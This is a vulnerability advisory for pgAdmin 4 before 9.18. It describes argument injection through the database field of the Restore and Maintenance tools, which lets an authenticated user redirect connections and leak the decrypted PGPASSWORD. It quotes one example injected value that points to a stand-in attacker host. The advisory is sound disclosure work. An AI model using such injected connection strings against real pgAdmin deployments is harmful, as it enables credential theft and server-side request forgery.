PT-2026-94389 · Pgadmin · Pgadmin
CVSS v4.0
7.1
High
| Vector | AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
Name of the Vulnerable Software and Affected Versions
pgAdmin 4 versions prior to 9.18
Description
The Restore and Maintenance tools pass the client-supplied
database field directly as the value of the --dbname option for pg restore and psql. Because libpq expands database names containing an equals sign into full connection strings, connection keywords in that value take precedence over the --host and --port arguments. An attacker can provide a value like host=attacker.example port=5432 dbname=x to redirect the utility to a server of their choice. Since pgAdmin exports the decrypted database password in the PGPASSWORD environment variable, the redirected connection may expose this credential to the attacker. Additionally, this allows outbound connections from the pgAdmin host to arbitrary network addresses. This issue is reachable by any authenticated user with tools restore or tools maintenance permissions, which are granted to the default User role.Recommendations
Update to version 9.18 or later.
Exploit
Fix
Argument Injection
Insufficiently Protected Credentials
SSRF
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Pgadmin